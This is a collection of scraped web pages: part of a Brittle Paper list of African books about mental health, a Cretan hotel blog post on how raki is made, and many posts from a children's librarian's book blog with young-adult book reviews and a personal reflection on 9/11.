Ada begins her life in the south of Nigeria as a troubled baby and a source of deep concern to her family. Her parents, Saul and Saachi, successfully prayed her into existence, but as she grows into a volatile and splintered child, it becomes clear that something went terribly awry. When Ada comes of age and moves to America for college, the group of selves within her grows in power and agency. A traumatic assault leads to a crystallization of her alternate selves: Asụghara and Saint Vincent. As Ada fades into the background of her own mind and these selves―now protective, now hedonistic―move into control, Ada’s life spirals in a dark and dangerous direction.
Narrated from the perspective of the various selves within Ada, and based in the author’s realities, Freshwater explores the metaphysics of identity and mental health, plunging the reader into the mystery of being and self. Freshwater dazzles with ferocious energy and serpentine grace, heralding the arrival of a fierce new literary voice.
Image from African Book Addict.
WILLOW WEEP FOR ME: A BLACK WOMAN’S JOURNEY THROUGH DEPRESSION, memoir by MERI NANA-AMA DANQUAH
Published by W. W. Norton & Company in 1998, it has been described by The Extraordinary Negroes as “the first book to focus on black women and depression.” From the inside flap:
This moving memoir of an African-American* woman’s lifelong fight to identify and overcome depression offers an inspirational story of healing and emergence. Wrapped within Danquah’s engaging account of this universal affliction is rare and insightful testimony about what it means to be black, female, and battling depression in a society that often idealizes black women as strong, nurturing caregivers. A startlingly honest, elegantly rendered depiction of depression, Willow Weep for Me calls out to all women who suffer in silence with a life-affirming message of recovery. Meri Danquah rises from the pages, a true survivor, departing a world of darkness and reclaiming her life.
*Meri Danquah is actually Ghanaian American.
For suggestions for this list, please email brittlesubmissions@gmail.com.
Tags: a particular kind of black man, a small silence, Akwaeke Emezi, Bassey Ikpi, freshwater, I'm Telling the Truth but I'm Lying, JK Anowe, Jumoke Verissimo, K Sello Duiker, mental health in literature, Meri Nana-Ama Danquah, Penumbra, Sky Raining Fists, Songeziwe Mahlangu, The Quiet Violence of Dreams, Tope Folarin, Willow Weep for Me: A Black Woman's Journey Through Depression
Yaa Gyasi’s Second Novel Forthcoming in July 2020 from Alfred A. Knopf
REPORT | Inside Nigerian Literature’s Sponsorship Problem and the Worsening Struggle Between Prizes and Defaulting Funders
About Chukwuebuka Ibeh
View all posts by Chukwuebuka Ibeh
Chukwuebuka Ibeh is a Staff Writer at Brittle Paper. An alumnus of the Purple Hibiscus Trust Creative Writing Workshop, his work has been published in McSweeneys, Clarion Review, Charles River Journal and elsewhere. He was longlisted for the Awele Creative Trust Award in 2017 and was a finalist for the 2019 Gerald Kraak Award. In 2019, he was named by Electric Literature as 'One of the Most Promising New Voices of Nigerian Fiction' in a feature introduced by Chimamanda Ngozi Adichie. He is a regular contributor with the New England Review of Books and lives in Port Harcourt, Nigeria.
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October welcomes the raki-making season
Destination Crete, Events & Activities, Gastronomy October 3, 2019 Creta Maris
You must have tried at least one shot of raki, the fiery spirit served at the end of every traditional Cretan meal. For many it’s an acquired taste, and whether you sip it, or down it in one gulp as the locals usually do, one thing’s for sure – it’s breathtakingly strong. Also called Tsikoudia, raki, is at the heart of Cretan culture, and October is the time it’s produced across the length and breadth of Crete. In every village the process for making raki has been handed down through the generations, and it’s an ancient ritual that follows the grape harvest each year.
Officially, only registered distilleries are allowed to make raki – a law that dates back to the 1920s when permits were first given to farmers to allow them to use the leftovers from the grape harvest for extra income, and to establish some health safeguards for the production of this highly alcoholic liquor. Normally containing about 37% alcohol, raki is similar in strength to whisky or gin.
How raki is made
Crushed grapes (known as strafylla – the leftovers after the grapes have been pressed for wine) are kept for 4 to 6 weeks in a sealed barrel. This mixture of skins, pulp, seeds and stems, ferments during this time, and the raki-making or kazanema begins when the time comes to boil the fermented sludge in a special cauldron, known as a kazani. A ritual in itself, the first distillation is an event marked by each village, with locals gathering round the wood-fired copper kettle. Ready to sample the new vintage, the guests will usually enjoy snacks and traditional Cretan music will be played to add to the party atmosphere.
When the grape mixture boils in the cauldron’s chamber, steam begins to form as condensation, which in turn liquefies to become the raki. The liquid is filtered and tested for alcoholic strength, as the first litres produced are usually so alcoholic they have to be discarded. Once the first precious drops of raki are produced – and tasted, the kazani will be in action for two or three weeks, producing enough raki for the community to enjoy for another year.
Where eagles soar: the lure of Lasithi Plateau
Explore Ierapetra: Lasithi’s hidden jewel
Visit CretAquarium: Explore the Wonders of the Mediterranean Sea
Celebrating 45 stays in 25 years in Creta Maris: Meet Mr & Mrs Ost!
Lasithi adventures: Exploring Sitia
Here’s Why the Menelaos Parlamas Museum of Rural Life Should Be on Your Bucket List in Hersonissos
Creta Maris at your fingertips!
Meet the Minoans in a theatre spectacle
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Remember how much I liked Coraline?
Well, turns out they are drawing a graphic novel adaptation, in addition to making a movie. I'm torn between frothing at the mouth with excitement and being a little disappointed that it isn't being drawn by Dave McKean, who did those great illustrations in the original. Still, it's Coraline, and it's a graphic novel. Plus, that movie looks really really cool. Merry Christmas to me!
And part of my New Year's resolution is to write a book review. Set the attainable goals, that's what I say.
Apparently I have Been Living Under a Rock
That's the only explanation I can come with for the fact that I've been scooped by approximately 95% of the blogosphere on the title for Harry Potter Seven: Harry Potter and the Deathly Hollows.
But . . . seriously? Deathly Hollows? Or maybe I've just read so much Harry Potter fanfiction in my time that just about any title sounds a little wacky.
Okay, now let's have a release date please!
Thanks to most of the people on my Blogroll for cluing me in.
Meme for Book Bloggers
Okay, this is for all you fellow YA and kidlit book bloggers out there. This is my attempt at starting a meme. I'll go first.
How many other kidlit blogs do you read?
Erm . . . a lot. Check out the ones on my blogroll off to the side, and even that's shamefully out-of-date. Whenever I find a new one, I add it to my Bloglines, which I check in with multiple times per day.
What's the most recent add?
Interactive Reader. She does a lot of YA books . . . 100% so far.
How often do you post a book review to your blog?
I try to do it every Monday and except for a few times when life intervened, I think I've been doing all right.
Do you post about anything else?
I used to post tidbits that came my way, (mostly from Blog of a Bookslut) but I've been very lazy/busy since about October and haven't really done much of that.
Do you only blog books you like, or the stinkers too?
I try to blog only books that score an 8 or higher on my personal scale. Usually I will pick up a book and within a few chapters, I'll know I have to blog this book. Though I admit to having blogged the occasional 7.5, which isn't so much gottablog-gottablog as, well, it was a pretty good read and I'd give it to a kid who asked for this type of book.
How do you keep track of what you want to read?
I actually do it non-digitally . . . the horror!! I have a blue cloth-covered journal that I bought at Target and keep on hand most of the time. I list the title and author when I initially hear about the book, then I take it to work and see if my system has it. When I find it and check it out, I cross it off. I just sent in a full page, typed, single-spaced, to the central purchasing department of books I'd heard about and been VERY PATIENT, I think, waiting for them to just buy it already. Clearly they needed a kick in the pants . . . um, I mean, a gentle reminder of the existence of this book.
How do you keep track of what you've read?
I used to keep it all in my head *gales of laughter*. Then I got into LibraryThing and started recording and tagging everything obsessively. I have to say, what the tag list reveals about my reading matter is . . . interesting. Some are predictable (love) and some aren't (apocalypse?!)
Do you work with kids?
In the age group of the books you mostly blog about?
I'm a children's librarian but I mostly blog YA books. That being said, I routinely find fabulous picture books and run after co-workers going, "You have to read this!" To which they say, "I'm on lunch! Go away or I'll set you on fire!"
Do you read grown-up books?
The occasional mystery or romance, but 99.9% of my reading matter is kidlit.
Okay, that's it. I tag whoever's reading this.
The Amazon Papers
Book: The Amazon Papers
Author: Beverly Keller
16-year-old Iris wishes her mom and aunt would lay off. So what if she prefers reading philosophy and fixing cars to going out on dates and having adventures? She’s happy the way she is. Even if she does wish that gorgeous pizza deliveryman would pay her a little more attention. Let other girls drink the cup of life; Iris is happy the way she is. Her staid reputation backfires, however, when her mother takes off on vacation and not only leaves her home alone, but saddles her with a pair of demonic under-five cousins. Nothing can happen with Iris around, can it?
Iris didn’t think so either, until she gets her foot smashed by a stiletto heel, her mom’s car gets stripped in the parking lot of a bowling alley, and she winds up at the airport at midnight to pick up an incontinent dog. If this is the cup of life, she wishes the damn waiter would come back.
It probably took me about an hour and a half to read, but I grinned all the way through. The whole thing has the feel of a Marx Brothers comedy, and Iris’s realization that she may not be the sensible girl everyone takes her for increases with each new disaster, until she finally takes control of her own destiny. Keller’s dry, literate humor and her sense of a heroine in thoroughly over her head makes this a quick little read that you’ll enjoy.
Ninjas, Piranhas, and Galileo
Book: Ninjas, Piranhas, and Galileo
Author: Greg Leitich Smith
Elias loves Honoria. But Honoria, alas, loves Shohei. And Shohei?
Would love it if his parents just gave the whole Japanese thing a rest.
Welcome to the slightly off-kilter world of the Peshtigo School, a place where science fairs spur animal-rights protests and Galileo-esque trials. At the center is this triad: Elias, Honoria, and Shohei, whose longtime friendship is being sorely tested by oncoming adolescence and the aforementioned science fair. They have a million questions: is it possible for piranhas to prefer bananas over bloody meat? Do plants really grow better on baroque chamber music? Can you get away with making your little brother do all your science-fair project? Can Elias ever live up to his genius brothers and sisters? Is Shohei ever going to convince his adoptive parents that really, he’s doing just fine without being immersed day and night in Japanese culture? Who is Honoria’s secret admirer, who by the way, writes really corny love e-mails? Will that snobby, condescending science teacher to admit Elias’s project might be valid, in spite of getting contrary results to the ones expected?
And the big one . . . is their friendship going to survive?
I had fun with this book. Smith intertwines the three stories in multiple-POV format, throwing in just enough lunacy to keep things interesting, but retaining the heart of these likeable middle-schoolers. While a lot of kids’ books assume that their readers have no interest in science, history, or law, Smith assumes all three and mixes them in like chocolate chips, without overloading readers with dull information. He’s written a companion/sequel called Tofu and T. Rex, which returns to the Peshtigo school if not these characters, and I hope he’ll continue. It’s a place where I want to return.
Not the End of the World
Book: Not the End of the World
Author: Geraldine McCaughrean
“The end of the world is a busy time if you intend to live through it.”
And Timna’s family does. While their neighbors mock and taunt, they have been preparing for an apocalypse--packing their things, gathering animals, and building an ark. Because this is most definitely the end of the world . . . at least for anyone who’s not in Noah’s family.
Then the flood comes, and Timna’s confidence in her family’s choices is shaken as she watches the terrible deaths of all those neighbors who mocked them. When she involuntarily rescues a young boy and his baby sister, she tries to tell herself that they are demons and her fervent father is right. But she keeps protecting them, until it all comes to the point where the world ends . . . again.
I knew the story of Noah and the ark so well, growing up, that after reading this book, I realized I didn’t know it at all. McCaughrean has actually sat down and thought about the effect of a mass flood on a population, and on a single human being. Thanks to this preparation, Not the End of the World is a shocking and thought-provoking book. She portrays the interpersonal relationships, strained and warped by claustrophobic shipboard life, in a way that the calm and sonorous tones of Genesis never evoked. While it’s mostly Timna’s story, McCaughrean also narrates through other characters (although only one Biblical character and never Noah), and she also gives distinct and fascinating voices to the animals aboard.
Timna herself, instead of being an idealistic rebel from the start, comes around to an understanding of her father, of God, and of moral choices gradually. It’s probably a good idea to know the story of the Ark before diving into this book, but when you do, be prepared to have the familiar story turned inside out.
Heavy Metal and You
Book: Heavy Metal and You
Author: Christopher Kovatin
Metalhead Sam and preppy Melissa are this year’s Least Likely Couple. But try telling them that. To the doubts and concerns of their respective groups of friends, they fall deeper and deeper in love. And while Sam’s friends aren’t thrilled at the way Melissa is making him go straightedge, he doesn’t care, telling himself that love is worth it.
But as their romance progresses, Sam finds himself making more and more changes for her and feeling less and less good about it. He loves Melissa, of course he does . . . but is it enough?
I surprised myself by picking up this book. I’m probably the last person on Earth to enjoy heavy metal, but this book, and Sam’s genuine and passionate obsession with the music, gives me a window into that world. It was also nice for me that Sam is no metalhead stereotype (probably because Kovatin himself is a heavy-metal fan and therefore knows there’s more to the group than spiked wristbands). Sure, he drinks, drugs, and moshes, but Sam also discusses literature and participates in a local drama club.
It’s a quick read, but one that will stay with you because of the questions that Sam faces about friendship, love, and identity. In the end, it’s not even necessary to understand who Deicide or Slayer are to understand Sam (well, okay, give me credit, I have at least heard of Slayer). This is a story about how much we change ourselves for love . . . and how much we should.
Book: Hidden Talents
Author: David Lubar
Edgeview Alternative School is where they send the dregs: the bullies, the misfits, and the hopeless. It’s filled with students and teachers who have nowhere else to go. Edgeview is Martin Anderson’s last chance to fix his life. But he just can’t help himself, and soon he’s fallen back into the habits of a lifetime, mouthing off to all the teachers, somehow managing to say the one thing that will make them angriest. So much for that.
Watching the other students, Martin slowly comes to realize that some of them aren’t just square pegs in a world of round holes, they’re lightning bolts. From Flinch, who always seems to know just what’s coming up, to Torchie, who manages to start fires without match or lighter, to Lucky, who is just that, his new friends each have a hidden talent that finds its way out in surprising and often destructive ways. Martin pushes them to refine and control their talents, because it may be the only thing that will ever get them out of Edgeview. He also tries not to resent their special gifts, knowing that he’s just your run-of-the-mill punk kid who’s already halfway down the drain.
But what if some talents are way more hidden than others?
Just like Holes, this tale of kids at the bottom and heading further down doesn’t make the mistake of valorizing or demonizing, but instead humanizes them. They’re likable, if flawed (there were a few times I was surprised Martin didn’t get smacked), and their reluctance to believe in their own gifts until they need them rings true. This story about discovering value in the valueless is something a lot of kids need to hear.
For some reason, I was expecting a lighter, goofier story than I got, maybe because of the cartoony cover of the edition I read. That’s okay; I loved what I got, and will definitely pick up the sequel (True Talents).
Book: Chicken Boy
Author: Frances O’Roark Dowell
Tobin McCauley has a lot to live down to. From his granny, who gets taken off by the police for driving on the sidewalk while dropping him off on his first day of school, to his hell-raising older brothers, to his father, who works and watches NASCAR, nobody expects anything of him. Then he meets Henry, who is on a mission to prove chickens have souls, and recruits Tobin as a co-researcher. Before he knows it, his entire life is changing, and all because of those chickens.
There have been a lot of books about grief, about parent death, about friendship, about broken families, about changing your life, and maybe even a few about chickens. But Frances O’Roark Dowell reassembles all these elements in a fresh new way, through the voice of world-weary Tobin. Through his matter-of-fact observances of his world, you see the wreckage left behind by his mother’s death due to cancer five years before, and the way that sheer inertia has the entire family in a stranglehold. That is, until Tobin makes a few tiny changes.
Perhaps one of the most interesting elements of this book is Dowell’s portrayal of these changes. While most authors write life-changes as a domino effect--one leading directly to the next--Dowell writes more as if they are jackstraws. One “straw” gets shifted, and all the others are subtly affected until suddenly the whole pile collapses and changes position. In other words, it’s not only Tobin’s life he’s changing; it’s everyone else’s, and their reactions to the changes in turn affect Tobin. By the end, his old world is left behind, but he doesn’t miss it.
And anyway, the chickens are still around.
This article from the Guardian on celebrity children's books was actually published a week ago. Shows you how up to date I am. Still, if you haven't checked it out already, have a look.
Utterly Me, Clarice Bean
Book: Utterly Me, Clarice Bean
Author: Lauren Child
Clarice Bean’s life has gotten Utterly Odd lately. Her best friend took off for parts unknown, and now she has to do a class project with the Loathsome Karl, for the hideous dragon-teacher. Not to mention the Evil Grace, her Utterly Arch-Enemy and Nemesis, is sure to win the prize cup for best project.
Woe is Clarice! At least she’s got her stellar collection of books about Ruby Redfort, girl super-detective, to keep her afloat. And when the prize cup suddenly disappears, Clarice gets the chance to put the really very quite useful skills she’s learned from Ruby to good use.
In the hands of another author, you might discover that the hideous dragon-teacher, the loathsome Karl, and the Evil Grace are really not that bad. Child only gives us one out of three (Karl, in case you’re interested; turns out the ability to make a volcano is really very useful when you’re doing a project on girl-spy novels). The real joy of this novel is Clarice’s Utterly Quite Individual Voice. With all the angst and drama of your everyday nine-year-old who’s just discovered adjectives, you just can’t imagine Clarice being anyone but herself--just like the title promises.
Not only does Lauren Child’s narrative sparkle with energy, so does the actual text. Playing with enlarged or shrunken font that will sometimes twine around the page, even integrating them into the lively illustrations, Child shows off the approach to visuals that make her picture books must-reads. Fans of those will adore this as they move into middle elementary years.
A Brief Chapter in My Impossible Life
Book: A Brief Chapter in My Impossible Life
Author: Dana Reinhardt
Simone has always known that she’s adopted. It’s kind of hard to miss. But it’s not something she dwells on. Her parents are great, and even her brother isn’t that annoying. She bumps along just fine until the day her parents announce at the dinner table that Rivka called, and wants her to call back.
Rivka is her birth mother, who wants to meet her daughter before she dies.
In spite of her doubts and hesitation, Simone finally agrees to call Rivka back. Over a period of months (and in between other life events) she cautiously gets to know her birth mother. In the process, she starts to learn how her mother’s faith as a Jewish woman informs her life, and begins to work out how she herself, raised by atheists, might feel about God.
This has to be the gentlest adoptive mother renunion story I’ve ever read. The parents are great. The birth mom is great. Heck, except for some initial internal conflict, even sixteen-year-old Simone is great. There’s none of the angst and drama of many other adoption/reunion stories, where there are horrible scenes of whyyyyyyyy did you give me up, and you’re not my real mother and if I love you I betray my real parents. Reinhardt takes a different path. There's not even the drawn-out hideous angst of a mother dying of cancer. Sure, it's sad (I definitely cried at the end), but Reinhardt instead chooses to show the quiet bravery and acceptance with which Rivka faces her coming death, and how Simone absorbs some of that strength.
The real question of this book is not, will Simone ever come to accept her birth mother? She does. She has. It’s, will Simone ever work out how God is going to fit into her life? And nothing distracts from that. Wonderful, thoughtful, sad, lovely.
I'd Tell You I Love You, But Then I'd Have to Kill You
Book: I’d Tell You I Love You, But Then I’d Have to Kill You
Author: Ally Carter
Cammie Morgan’s got a pretty normal life. She lives with her mom and attends the Gallagher Academy for Exceptional Young Women, and she’s got good friends. Except that she speaks fourteen languages, can kill a man in seven different ways (three of which involve uncooked spaghetti), and the Gallagher Academy is a training school for future superspies. Sooooo . . . normal is a pretty relative term here.
At the start of her sophomore year, on a completely routine mission--um, assignment--for Covert Ops class, Cammie meets Josh. Like most other townies, Josh has never met a Gallagher girl and hasn’t the foggiest notion that they consider Mata Hari an amateur. He thinks she’s a normal teenage girl. She knows from the start that she has to let him go on thinking that. For Cammie, this may be the most dangerous undercover mission she’ll ever undertake. Because national security isn’t the only thing on the line here . . . so is her heart.
This is a lovely bit of fluff, a book to make you smile on a rainy Thursday. It’s kind of like James Bond on estrogen and Cover Girl. Sweet, warm, and very, very funny, Carter’s writing makes you feel for this future superspy who’s as lost as any normal teenage girl when it comes to boys. One of Carter’s real gifts is dropping in off-handed one-liners that are both laugh-out-loud hilarious and highlight how truly strange Cammie’s life is.
With its open-ended epilogue, Carter leaves the door wide open for sequels (the first of which is in the works). Word is, she’s also signed a deal with Disney for a TV movie. Here’s hoping they don’t mess up this great book.
Cybils!
It was really only a matter of time before the kidlit bloggers banded together to create their own awards for the stuff they read and blog about.
The Cybils
The 2006 Children's and YA Bloggers' Literary Awards
The rules, quoted from the Cybils blog:
1. The book must be published in 2006 in English. Translations and bilingual books are okay too.
2. You can be anybody. You don't have to be a blogger to nominate a book. You can even be the author, the editor, the publicist, the next-door neighbor or best friend or just a random Googler.
3. If a book you love has already been nominated by someone else, you don't need to second it. We're pretty smart. We'll see it. Promise.
4. Please, pretty please, only nominate one book per category.
For me, the hardest part is gonna be the whole nominating just one book per category. Gaaaaaah! There's so . . . many . . . good ones!! *falls over*
Anyway, didja see that part 'bout how anyone can nominate? Didja? Whatcha waitin' fer???
P.S. Yes, I am extremely hopped up on caffeine and being back home again. Did read some good books on my travels, so if you're very lucky I may do a double post tomorrow.
Back soon!
Just wanted to let you all know that I'm at a training this week across the country. Of course, this doesn't mean that I've stopped reading, but it does mean I have less time to actually blog. Seriously, though, next Monday I'll be back. I may be really really jet lagged, but I'll be back!
You people are sooooooo lucky I had yesterday off and read all those books. Instead of turning this blog into another silly-links record (today's would have been Flight of the Hamster, in case you're interested), I have something bloggable! I make no promises for next week, though . . .
Book: Fly on the Wall
Gretchen Yee's got it rough these days. Her parents are getting a divorce, her best friend never has time to hang out, her drawing teacher thinks she's a derivitive hack, and the boy she adores doesn't seem to know she exists. (Do they ever?) All she's got are her Spidey comics and her fantasies of being someone who can change the world. Unfortunately, she's just boring ol' Gretchen, invisible in spite of her dyed red hair. Frustrated with trying to understand any members of the human race (including herself), she focuses on the most mysterious segment and wishes to be a fly on the wall of the boys' locker room.
Now she's about to find out why "Be careful what you wish for" is such a cliche.
This extremely fast little read is written in a mix of first-person and stream-of-consciousness that somehow makes it perfectly logical that a sixteen-year-old girl would turn into a fly (or if not logical, at least acceptable). Lockhart never attempts to explain the transformation and that's good, because she can concentrate on Gretchen's discoveries about the boys in the locker room. Some are obvious for the situation (she makes a hilariously frank and impartial catalogue of male attributes), and others are less so. As the no-longer-proverbial fly on the wall, Gretchen stands silent witness to the petty cruelties, raging insecurities, and terribly human flaws that drive the boys in her school.
Like the artwork that features near the end, Lockhart draws a merciless, warts-and-all portrait of teenage boys that turns out strangely beautiful. Armed with the knowledge that the Teenage Boy is no mysterious creature, but as human as herself, Gretchen is able to return to her own body with the courage to reach out across chasms she never would have braved before.
The debt to Kafka's Metamorphosis is obvious--Lockhart even makes a point of having Gretchen read it in lit class. Having never read it myself, I can't make a comparison. But don't worry about that--Gretchen's and Lockhart's story stands on its own.
Seven Daughters and Seven Sons
Okay, I'm down to almost the last of my backlog. Unbelievable as it seems, I'm running out of really fabulous books. I've read a lot of good ones, but there's not many that have that special spark that make me want to talk them up to the world (or at least, as much of it as reads this blog).
Any suggestions? Leave them in the comments!
Fortunately, I do have this one. . .
Book: Seven Sons and Seven Daughters
Author: Barbara Cohen and Bahaji Lovejoy
Malik, known as Abu al-Banat because he has no sons, does have seven daughters. In the city of Baghdad, this is a terrible misfortune, made worse because he has no money to give them dowries. To make things worse, Malik’s brother (who has the massive fortune of seven sons and a thriving business), refuses to help out by either providing dowries or allowing his sons to marry their cousins, and mocks Malik’s misfortune. It looks as if the seven sisters are doomed to a life of poverty and/or unhappy marriages. Unwilling to accept this fate, the fourth daughter, Buran, comes up with a plan that might save them all. But to do it, she has to leave home, travel as a boy, and make her way as a merchant in eleventh-century Iraq.
On her journey, Buran discovers a real head for business and a flair for making money. She also meets and befriends Mahmud, the prince of Tyre. But when he finds his feelings deepening into more than friendship, he begins to put poor Buran through a series of tests to see if she is a man or woman, and even he’s not sure which outcome he wants. Is happily-ever-after in the cards?
This book sucked me in right from the start. It retains enough of the storyteller’s flavor about it (it claims to be based on an Iraqi folktale) to make it feel like a fairy tale, but I found myself caring very much for clever, pragmatic Buran, her beleaugered family, and even the spoiled prince Mahmud, who shows promise under the influence of Buran. Divided into three parts, each with its own distinct storyline, it still follows a nice narrative line. Check out the final part for the most glee-inducing (and fairy-taleish) elements, when Buran gets her revenge on the seven male cousins who rejected herself and her sisters at the very beginning. It also shines a light on a culture very little understood in the west. I found this at the library, but I've just gotta get my own copy of this great tale of a girl who makes her own happy ending. Where’s the fairy godmother? Who knows? Who cares?
Posted by Bibliovore at 4:06 PM 10 comments: Links to this post
Are You Kidding Me?!
After reading this, I think I need to go lie down until the blinding rage subsides.
*sputters on the way out*
As a children's librarian and someone who enjoys children's lit on its own terms, I feel highly qualified to say: Dude! Coooooooooooooool!!!
Not only a new Sendak, but a pop-up Sendak?
Just as I'm in the middle of The Queen of Attolia and have just turned in its sequel, The King of Attolia , this gets posted at the "Unshelved" Sunday Book Club. Kewl. Eugenides may well be one of the coolest trickster characters in YA lit. *greedily* Miz Turner, do we get another?
And yes, I'm fully aware that I'm reading the series backwards. I've read it before, nothing will spoil the ending.
Book: Bad Kitty
Author: Michelle Jaffe
Seventeen-year-old Jasmine Callihan is in Vegas. Woohoo! But she’s there with her dad and her ludicrously young stepmom, not to mention her annoying cousin, Alyson, and Alyson’s twice-as-annoying best friend. Woop-de-doo. It doesn’t help that her dad (who has already lost points for not allowing her to take that way cool police internship) is constantly nagging her about why she can’t be more like Alyson.
Alyson is a Model Daughter. Alyson would never knock a wedding cake into the swimming pool while chasing a (possibly fictitious) cat. Alyson would never use eyeshadow to dust for fingerprints. Alyson’s friends would never crash their vacation to help Alyson solve a mystery involving the cat, the cat’s little owner, and the cat’s little owner’s superstar mom who is hiding from her murderous ex-husband. Alyson would never fall in love with a possible Evil Henchman (but he’s so cute!). Wouldn’t Jasmine like to be more like Alyson?
Actually, Dad, no. Jasmine is fine being herself. Frankly, Jasmine (with the help of those vacation-crashing friends, Polly, Tom, and Roxy) is having a blast being herself. And readers will have a blast with her adventures.
This delicious farce of a book reads like The Princess Diaries meets CSI meets the Weekly World News (which plays a role in the plot) meets the BeDazzler meets lots and lots of sugar meets The Magical Multiplying Footnotes. Logical? No. Realistic? No.
On the other hand . . . hilarious? Yep. Clever? Yep. Great characters? Yep, yep, triple yep. Oodles of fun? You betcha. There’s no other word for this book but “madcap caper.” Okay, well, that’s two words, but seriously, read it and tell me I’m wrong. Eh? Eh? Thought so.
Double Identity
Book: Double Identity
Author: Margaret Peterson Haddix
Bethany Cole has been protected and indulged all her life. Though she’s never had a lot of friends, her adoring parents have built their lives around her. So when she is suddenly bundled into the car in the middle of the night and dropped off at her mysterious Aunt Myrlie’s, she’s justifiably surprised.
And all that’s before she finds out about Elizabeth . . .
Surrounded by lies and half-truths, it’s oh-so-tempting to just let it go. Her parents are scared, Aunt Myrlie and her daughter Joss are hesitant, and there’s the creepy man in the shadows. But it’s even more tempting to keep digging, because Bethany knows that when she understands Elizabeth, she’ll understand herself.
I found this a fascinating book for its reasonable and calm look at a topic that tends to polarize, and Haddix’s ability to apply the grey areas she’s unearthed to real-life emotions and relationships. Not only is this a story about contemporary scientific breakthroughs, it’s a story about growing up in the shadow of a dead sibling and the constraints of hyperprotective parents.
One of the most interesting characters is Joss, Bethany’s grown-up cousin who was Elizabeth’s best friend and is now a minister. She and Bethany have a number of talks about God, ethics, and morality without it coming off preachy or pat--an interesting way to include this often-sidelined and yet very important point of view on the issue at hand. Margaret Peterson Haddix is best-known for her lengthy Shadow Children series, which I’ve been meaning to pick up for some time now. Maybe when my library card isn’t maxed out . . . again.
When I'm Sixty-Four
No book today, folks, just deep thoughts.
When I'm sixty-four, some child will ask me where I was and what it was like. And I'll tell them.
"I woke up and I knew something was wrong." I woke up around 8:30 Eastern time, before the first plane hit, and I remember that I had the distinct feeling something was off-kilter. I don't know if it was as strong as I remember it being. Maybe I want to tell myself that I knew something was wrong, because how can we have lived those last few days, minutes, hours before our safe little world was broken and not have somehow known?
"My roommate ran in the house and up the stairs and told me with tears pouring down her face, that somebody had flown a plane into the Twin Towers and that it was an act of war." An act of war. I remember those words verbatim. I have not lived through war. I've never lived through that kind of vulnerability. At least, not until that morning.
"I remember that the sky was blue." It was so blue. So blue, in those CNN shots of the wounded skyline. The only cloud in the sky was the thick, greasy billows of smoke boiling from the towers. You felt as if it should be pouring rain, tears from heaven, but the sun shone.
"I remember that we set aside that hymn in Latin class." For about a week prior, we'd been translating some medieval hymn that went, "Let us rejoice, for tomorrow we die." We were mid-hymn, but after that day, the prof set it aside and none of us saw it again.
"I remember that the President finished reading his book." I don't have a lot of respect for the Commander-in-Chief, I really don't. But what little I do have is because I remember the news reports that the President was reading to schoolchildren when the plane hit. An aide ran in and, whispering in his ear, informed him of what had happened. He listened, maybe nodded, and turned back to the book he was reading aloud to finish it before he left the school, probably to go right to New York.
I wonder what the book was. I wonder if the children understood, or understand, that they were that close to history.
"And the Lord God wept." I want to find a copy of this article. Sometime just after, the Onion ran a special issue called "Holy F---ing S---, Attack on America!" I depend on the Onion to reassure me that the world is as usual, that nothing is so serious that it cannot be satirized. In the main, the articles were satirical Onion stuff. But there was one called "What Part of 'Thou Shalt Not Kill' Do You Not Understand?" As can be inferred, it was God yelling at humanity, but the last line was what brought on the waterworks. It went something like, "At this point, the Lord God broke down and wept."
It's not particularly coherent, or even that deep. How much use will these little scraps be to that child I tell them to? How many pages will it take up in their required report for school? Will they understand how drastically everything changed? Will they even understand what the world was like before we knew such a thing was possible?
We say we won't forget. And we who lived through it and understood it won't. But the children don't understand, not in the way we do. They called this the New Pearl Harbor, and it was. It is. But Pearl Harbor to me is a distant piece of history, something that happened to other people. To my children and grandchildren, 9-11 will be something that happened to other people. They'll never know was it was like to live both in the before and the after.
God willing, they never will.
Book: Angelfish
Author: Lawrence Yep
Robin Lee is in big trouble. If her parents find out she broke the window at the Dragon Palace, they’ll ground her, and if that happens, she won’t get to dance the part of Beauty in her ballet recital. To keep that from happening, Robin agrees to work in the shop after school to pay off the cost of the window.
Sometimes she thinks that just letting her parents find out would be better, though. Her new boss, Mr. Tsao, is a permanently crabby old man, forever calling her names like “bunhead” and “half person,” (because Robin is only half Chinese) and mocking her passion for ballet. The only time his gentleness ever shows through is with the fish in the shop, especially his treasured angelfish. Is it remotely possible that this Beast will ever allow himself to be helped?
In the third book of the series featuring Robin Lee (the first two are Ribbons and The Cook’s Family), Yep digs deeper into recent Chinese history as well as some of the difficulties of growing up rooted in two different worlds. Though the whole story is told through Robin’s eyes, the real hero of the story is the wounded, angry Mr. Tsao, whose losses are almost unimaginable to Robin. But they are life experiences for him, not to mention Robin’s grandmother, and many of her friends throughout San Francisco’s Chinatown. The ending seems to come a little too quickly and rosily, but Robin’s continuing journey through her own background will be compelling.
The Book is Always Better
Okay, remember how I said that if "Confessions of a Teenage Drama Queen" was half as good as the source material, I was heading for Blockbuster?
Well . . . it is, but only half. Some bits feel like the Disney writers suddenly thought, "Oh wait, we have to showcase Lindsay's singing and/or dancing!" and they stuck it in whatever scene they happened to be writing at the time. Still, with elaborate and stylistic fantasy sequences that echo Lola's narrative flights of fancy, it stays surprisingly true to the book (even to the point of using Sheldon's original dialogue) and except for a really overdone Carla Gets Hers scene at the very end, I enjoyed it. Not enough to buy it, but maybe enough to pick it up again if I feel like a grin.
And they kept that wonderful Lola/Ella dynamic intact!
The Fall of Fergal
Bibliovore, it's Tuesday.
It is?
I could have sworn it was Monday.
No, it's Tuesday. You were supposed to post this yesterday.
Oooops. Blame the Dr. Who I've been watching practically nonstop. I defy anyone to take note of the day of the week when you can be thinking about Christopher Eccleston and/or David Tennant instead.
Book: The Fall of Fergal
Author: Phillip Ardagh
Published: 2002 (Great Britain)
This book starts with a death - and not any run-of-the-mill death, but a six-year-old falling out a hotel window and going splat! on the sidewalk below. Oh dear. Well, the title did warn you. From there, Ardagh doubles, triples, and quadruples back to tell the story of how this particular six-year-old came to be at this particular window and what happened to make him fall.
This is a morbid, silly, twisted, and totally nonsensical tale. So you know I loved it. Ardagh not only acknowledges but positively delights in the morbidity of his tale. Loaded up with convoluted wordplay, Dickensian melodrama, and Snicketesque narrator interaction, The Fall of Fergal and its two sequels (Heir of Mystery and The Rise of the House of McNally) are fast reads that should delight any kid who’s not overly concerned about a logical plot but does want to have lots of fun.
Posted by Bibliovore at 10:11 PM 1 comment: Links to this post
Catching On, Are We?
Check out this article from the Philadelphia Inquirer about the crossover appeal of YA books. They offer up the usual reasons: happy endings, more entertaining, but they finally figure out what we knew . . . this is good stuff, y'all.
Thanks to Blog of a Bookslut for the link. Who else do I ever get book news from?
Marly's Ghost
